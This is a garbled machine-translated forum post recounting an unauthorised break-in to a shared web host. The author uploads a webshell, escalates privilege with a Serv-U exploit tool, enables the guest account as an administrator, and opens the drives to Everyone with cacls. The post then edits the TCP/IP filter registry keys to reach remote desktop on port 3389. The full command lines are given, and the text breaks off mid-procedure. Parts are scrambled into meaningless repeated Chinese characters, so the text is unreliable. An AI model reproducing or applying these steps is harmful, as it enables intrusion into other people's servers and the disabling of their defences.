From uploading WebShell to break through TCP / IP screening to 3389 terminal landing
Author: LvHuaNa one: get webshell a little test tonight, because I am too much food, then I would not highly technical, this is it .......... Everything is over, no The way is settled, I hope to understand this little post. Today is a boring day, I am not bored at night, I have to go to a video chat site, I suddenly discovered a special fire violence of a chat room, the number of 500 people have been inside (full staff), brush N I didn't go in .......... More depressed! :( Think about it is nothing to do, test how the host is safe to do, huh, huh (too dish, saying that people safety is really raising yourself) Ping under CMD, then got the other party IP, then landed http://whois.Webhosting.info/ The other ip Take a look at the other sites, ha, this time, there are dozens of sites, it is estimated that I can still find a two-vulnerable site. Find, finally found a pages of a magical band vulnerability http://www.xxx.net/upfile_soft.asp, upload a WebShell (Haoyang 2005 official version) first (how to upload me is not Luo, uploading the tool now Five).
Second: Successfully improved rights to establish users to get the WebShell, high-intensity, and suddenly found that there is no permission, can only be switched in the directory of our own Webshell (CDEF disk can't be browsed), and even delete files No. ^ Scan his IP with SuperScan, and then see the serv-u, version 5.0 he used through Banner. To 〖wscript.shell, let's try to execute the CMD command. You can't, if you enter the net user, you don't have it, then you can perform the CMD command through wscript.shell, and then enter the NET USER. Return each other's User list, haha, this It's good, I can get it! ! Upload SERV-U lifting tool to D: / A004 / TGGTWE / ****. COM / UPLOADSOFT directory below, rename: test.exe, then return to 〖wscript.shell to execute commands, 嘿嘿, immediately Only fat chicken is going to hand, please ING ~ Erhaw command with WScript.Shell: d: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "Net user guest / activ: YES" # Activation Guest Account, I like to use this account D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "net user guest lvhuana" # Set the password of the guest account to lvhuanad: / a004 / tggtwe / ** **. com / uploadsoft / test.exe "Net localgroup administrators guest / add" # enhances guest rights to Admin rights, the account is established, perform NET localgroup administrators to see success, by echoing knowing the addition of success.
Then when you perform NetStat -an, you see the terminal port of his open is the default 3389, OK, the connection is try ~ 3: Solve the TCP / IP filter connection! ? Halo ........... I took out Superscan to sweep his 3389, couldn't sweep at all ...... (opened firewall!? Rely, my little back .. ...) There is no way, return to WScript.shell again to perform CMD command: d: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "Cacls.exe C: / E / T / g Everyone : F "# Set the C disk to Everyone can browse D: / a004 / tggtwe / ****. Com / uploadsoft / test.exe" Cacls.exe D: / E / T / G Everyone: f "# put D The disc is set to Everyone can browse D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "Cacls.exe E: / E / E:" Set the E disk to Everyone can be viewed D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "Cacls.exe f: / e / t / g everyone: f" # Set the F disk to everyone can browse this minimum can be traversed throughout Hard drive, I have turned around in the hard disk, I haven't found his firewall file, there is a number in my heart, and it is definitely he for TCP / IP screening! (Of course, there is also the possibility of doing the server in the internal network. If you can determine from ipconfig -all) breakthrough TCP / IP filtering we can change his registry to achieve, what we have to do is to export three of his registry, After the changes are imported, return to 〖wscript.shell to perform the cmd command: D: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "regedit-E d: / A004 / TggTWE / * ***. com / uploadsoft / 1.REG HKEY_LOCAL_MACHINE / SYSTEM / Controlset001 / Services / TCPIP "# 导出: 册 表 关于 表 关于 表 第一 表 第一 表 第一 表 第一 表 第一: 第一: d / Test.exe "regedit-E d: / a004 / tggtwe / ****. com / uploadsoft / 2.reg hkey_local_machine / system / controlset002 / service / tcpip" 导 导 导 册 表 表 表 表 表 表 表 表D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "regedit -e d: / a004 / tggtwe / ****. Com / uploadsoft / 3.reg hkey_local_machine / system / currentControlset / Services / TCPIP "# Export the third place about TCP / IP filtering in the registration table and then return to 〖stream〗 or 〖FSO〗 Discovery 1.reg, 2.reg, 3.Reg is quiet lying there, 嘿嘿 ~ 1. REG, 2.REG, 3.REG Download Back to your hard drive, change the TCP / IP screening, first open 1.Reg to find "EnableSecurityFilters" = DWORD: 00000001 Put the back The number 1 is changed to 0, then change 2.Reg, 3.Reg, change the method,
